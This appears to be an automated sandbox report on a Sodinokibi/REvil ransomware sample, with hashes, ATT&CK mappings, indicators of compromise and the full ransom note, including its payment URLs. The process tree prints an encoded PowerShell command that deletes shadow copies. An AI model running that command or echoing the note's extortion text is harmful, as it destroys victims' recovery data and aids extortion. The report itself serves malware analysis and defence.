sodinokibi | 14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708

General

Target

adb.vbs.exe
Size

116KB
MD5

b86ad4241b01376b3924a380f6f4c934
SHA1

10682d08a18715a79ee23b58fdb6ee44c4e28c61
SHA256

14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708
SHA512

54fd19cfc37255e7ddf3456d1a2989558522cf58e5eee6ca916c19542921fe3ba4e7a431a35e0e1edbfc37c5651d392e7c3c54eb408754c0488021b16fdf92c9
SSDEEP

1536:aTZINbRh0SKws6KTUkmHlntMvfWhbpfCqeICS4AKvQIFlswOmZFS0cnwpIGmQwB:FRix3PWhNlOVFmw5q0cifmQ

Score

10^/10

sodinokibi ransomware

Malware Config

Extracted

Path

C:\Recovery\9cfw9k82-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 9cfw9k82. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/125?s=7ee0235fc7f67403393ad971dea5809e [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5D9FFE09A38E1DBA 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/5D9FFE09A38E1DBA Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: F4QKEFxZX3EXic1j9KY7Imk1ZL7HLI2DTc07in39hfkHpYqpVCa1k7aQB8KrPuRa A15z72vt8y1Nh8uuGT5C2Ixuia2LBpA8O4G1RkKPQgeTJOOZy/p5Eg++7NKioLRY 5GloC5n7teEp80DePdo/qzy3ZbW+LdnN9uYtH/a8OemHBgu+N3cvhlohnLwwFfJJ ASt0KUpGZsOQzSXVMMEK49eyfY7CZ+Z4pbxCvD23l4x1pE/6Gv8FSOAInOFZP43L 4sI31e8iNm6ijUCGQSuoEHfCKlk80XH1f0oV94s0IC8wmAx5OFmhmnoNwsTzGOSj 4NpMBaHb18oenBv3Kf4mSfgoKTsUiQB4UX+w/Hv21m9bed8+76z1sinEnA07mwcF 66MJ38bpP+p52a5BJHrHVvYrwvvYKd3NPt7ZACcoypznYHp8dsfLfYNlqtCO9vxE 7gFAufda4TZryAX1Zy8CiRabJexYQdhXLaj9m0Q8KMpL29vBUIbgx2ZhbVU9OsVa TioQbLm6grV83l+dF1lhLZptd7X3BillkeMnlRPCFrsLQcFdB901wPYJyREnrjKm Tiux5yb4pKknLSA0k3z/YxVnzXqdSABC3jDN3NQyk7vhyX3vrQnXEP9NENHyX54s vEQIUvizpN2+KhPPpEE+saE0qcR+AlJeT8pTHbbAl7T/sXeguyoUuNgjrValMlgP K6woZPXIRAEUxYddHAqt7Sj5k1wcr8SZzMQS3a6tY6WCPii2x8waCfBf88dCHiL/ crvPxf0Yu4YnwxXTj7gmNFe61/Hqt7Z4/lOoTTtjDAf04OsTWQH4nCw10uiN1AAB 08WJDYBtJGEaqm82/oNgV4GXn5MYapNU4FIwpwdqsH26KwXuhkrI7M95ZzwtYypb oW/XyNKyqXSbnPWY1yOjaSn/rOwQLpdEby02Gw2fZsibmpuR1/HL0cfjQWWbImVS FLo67qggnHKEk06iKZRxpSE9yarCiJREvX4GP0zK+fik5xBG+tvAkxP+9Uhi9rhN XAiPLCi5/ceybhSDTSA61wVheHrLJsK4pdLxsjZPxgERWsM+ks/bRM2zSlpXeKAO Rt1Za1zHPVZY1CVP49vW25SNyI7Wra5BkDOsRW6qhz8UAD1zIuMi/eqFoEqCsUm2 AT9ab1ADYbWdvDyV7JReZ3ZtmaZCwwDr5tzqyRNQHHrSTnVrvcjBYJRvHpRMjHQn NZRl09KWGLg0N97SzpDjlJvHEecyBlZ24UmM+5pNtAk4XKlBCJID+TmTPw9JFlC3 rWECSjegrA27CLniEORWfTYpziGaQY3MoEdrDIOuw8NNWn+7cjEwgDIhOWJ31tdN LjhWvZlXJxvkgdTrjOtVYtIT1VmpPpjlaZBTrA== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5D9FFE09A38E1DBA

http://decryptor.cc/5D9FFE09A38E1DBA

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

adb.vbs.exe

description	ioc	process
File opened (read-only)	\??\S:	adb.vbs.exe
File opened (read-only)	\??\X:	adb.vbs.exe
File opened (read-only)	\??\A:	adb.vbs.exe
File opened (read-only)	\??\G:	adb.vbs.exe
File opened (read-only)	\??\H:	adb.vbs.exe
File opened (read-only)	\??\K:	adb.vbs.exe
File opened (read-only)	\??\L:	adb.vbs.exe
File opened (read-only)	\??\Q:	adb.vbs.exe
File opened (read-only)	\??\F:	adb.vbs.exe
File opened (read-only)	\??\E:	adb.vbs.exe
File opened (read-only)	\??\M:	adb.vbs.exe
File opened (read-only)	\??\Z:	adb.vbs.exe
File opened (read-only)	\??\D:	adb.vbs.exe
File opened (read-only)	\??\B:	adb.vbs.exe
File opened (read-only)	\??\I:	adb.vbs.exe
File opened (read-only)	\??\J:	adb.vbs.exe
File opened (read-only)	\??\R:	adb.vbs.exe
File opened (read-only)	\??\W:	adb.vbs.exe
File opened (read-only)	\??\Y:	adb.vbs.exe
File opened (read-only)	\??\N:	adb.vbs.exe
File opened (read-only)	\??\O:	adb.vbs.exe
File opened (read-only)	\??\P:	adb.vbs.exe
File opened (read-only)	\??\T:	adb.vbs.exe
File opened (read-only)	\??\U:	adb.vbs.exe
File opened (read-only)	\??\V:	adb.vbs.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

adb.vbs.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\v7h58.bmp"	adb.vbs.exe

Drops file in Program Files directory 35 IoCs

Processes:

adb.vbs.exe

description	ioc	process
File opened for modification	\??\c:\program files\SaveBackup.eps	adb.vbs.exe
File opened for modification	\??\c:\program files\SuspendShow.mp2v	adb.vbs.exe
File opened for modification	\??\c:\program files\UninstallLock.wdp	adb.vbs.exe
File opened for modification	\??\c:\program files\UnlockSuspend.wma	adb.vbs.exe
File created	\??\c:\program files (x86)\9cfw9k82-readme.txt	adb.vbs.exe
File opened for modification	\??\c:\program files\UnregisterResize.wma	adb.vbs.exe
File opened for modification	\??\c:\program files\DisconnectBackup.m1v	adb.vbs.exe
File opened for modification	\??\c:\program files\EnterConfirm.M2T	adb.vbs.exe
File opened for modification	\??\c:\program files\MergeRemove.xlt	adb.vbs.exe
File opened for modification	\??\c:\program files\ReceiveMeasure.dotx	adb.vbs.exe
File opened for modification	\??\c:\program files\ShowGroup.wma	adb.vbs.exe
File opened for modification	\??\c:\program files\SwitchBackup.ini	adb.vbs.exe
File opened for modification	\??\c:\program files\CompareImport.emf	adb.vbs.exe
File opened for modification	\??\c:\program files\GetConvertFrom.3g2	adb.vbs.exe
File created	\??\c:\program files\9cfw9k82-readme.txt	adb.vbs.exe
File opened for modification	\??\c:\program files\EditLimit.mpg	adb.vbs.exe
File opened for modification	\??\c:\program files\PopDebug.wmv	adb.vbs.exe
File opened for modification	\??\c:\program files\ResetPublish.cfg	adb.vbs.exe
File opened for modification	\??\c:\program files\WriteUnblock.ini	adb.vbs.exe
File opened for modification	\??\c:\program files\BlockFormat.mp3	adb.vbs.exe
File opened for modification	\??\c:\program files\OutRename.inf	adb.vbs.exe
File opened for modification	\??\c:\program files\RestartResize.3gp	adb.vbs.exe
File opened for modification	\??\c:\program files\RestoreBackup.dwg	adb.vbs.exe
File opened for modification	\??\c:\program files\TraceDismount.wmv	adb.vbs.exe
File opened for modification	\??\c:\program files\MergeRedo.dotm	adb.vbs.exe
File opened for modification	\??\c:\program files\EditMeasure.3gpp	adb.vbs.exe
File opened for modification	\??\c:\program files\OpenSubmit.txt	adb.vbs.exe
File opened for modification	\??\c:\program files\ReceiveAssert.mp2v	adb.vbs.exe
File opened for modification	\??\c:\program files\SendRegister.edrwx	adb.vbs.exe
File opened for modification	\??\c:\program files\SwitchShow.xla	adb.vbs.exe
File opened for modification	\??\c:\program files\ConvertFromConfirm.3gpp	adb.vbs.exe
File opened for modification	\??\c:\program files\EditDebug.doc	adb.vbs.exe
File opened for modification	\??\c:\program files\SyncDebug.dib	adb.vbs.exe
File opened for modification	\??\c:\program files\UnlockSync.mpv2	adb.vbs.exe
File opened for modification	\??\c:\program files\DebugProtect.au3	adb.vbs.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

adb.vbs.exepowershell.exe

pid process

2872 adb.vbs.exe
2872 adb.vbs.exe
2516 powershell.exe
2516 powershell.exe
2516 powershell.exe

pid	process
2872	adb.vbs.exe
2872	adb.vbs.exe
2516	powershell.exe
2516	powershell.exe
2516	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

adb.vbs.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2872	adb.vbs.exe
Token: SeDebugPrivilege	2516	powershell.exe
Token: SeBackupPrivilege	3864	vssvc.exe
Token: SeRestorePrivilege	3864	vssvc.exe
Token: SeAuditPrivilege	3864	vssvc.exe
Token: SeTakeOwnershipPrivilege	2872	adb.vbs.exe

Suspicious use of WriteProcessMemory 2 IoCs

Processes:

adb.vbs.exe

description	pid	process	target process
PID 2872 wrote to memory of 2516	2872	adb.vbs.exe	powershell.exe
PID 2872 wrote to memory of 2516	2872	adb.vbs.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe
"C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe"
1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1776

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\9cfw9k82-readme.txt
Filesize
7KB

MD5
53708047bbf3263c5ef20b7397d5a08e

SHA1
f96505bb65c6fb546a6099db7fac9b723ca6f139

SHA256
e8c96812146e3f1701b463193edd3f09fd6e73ea54ad7b5393a4d9c3fc8e581e

SHA512
a4ae4df370fdc25b791e52714335782a158cfddc3f1c39ecf0c1fd4a1fe49166b9e2b64448c826a953fd921a533e5d9bc68689151878a823eeeb6b4a586ceaa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bxokyvzr.vv4.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Windows\System32\catroot2\dberr.txt
Filesize
181KB

MD5
6717a70cdc8e2c8ef688461c50c3878b

SHA1
901d4df1871868b7cd72594c663ae192669a93e4

SHA256
4fab14b35d5af26348af243892dd0f61cd122caed0d864c6ffafed9bbb12e77d

SHA512
352e38e4484c25294c5c00ce437e24e60ae1a3a142633dab36d63c5b837d968e79fd110edff7f40c29fd03703e3e5792e02c106a6e92b71edb900a255e74da2d

Download Submit
memory/2516-124-0x0000015F272D0000-0x0000015F272F2000-memory.dmp

Filesize
136KB

Download
memory/2516-132-0x00007FFDBB160000-0x00007FFDBBB4C000-memory.dmp

Filesize
9.9MB

Download
memory/2516-134-0x0000015F27200000-0x0000015F27210000-memory.dmp

Filesize
64KB

Download
memory/2516-135-0x0000015F27200000-0x0000015F27210000-memory.dmp

Filesize
64KB

Download
memory/2516-136-0x0000015F3F6B0000-0x0000015F3F726000-memory.dmp

Filesize
472KB

Download
memory/2516-155-0x0000015F27200000-0x0000015F27210000-memory.dmp

Filesize
64KB

Download
memory/2516-159-0x00007FFDBB160000-0x00007FFDBBB4C000-memory.dmp

Filesize
9.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads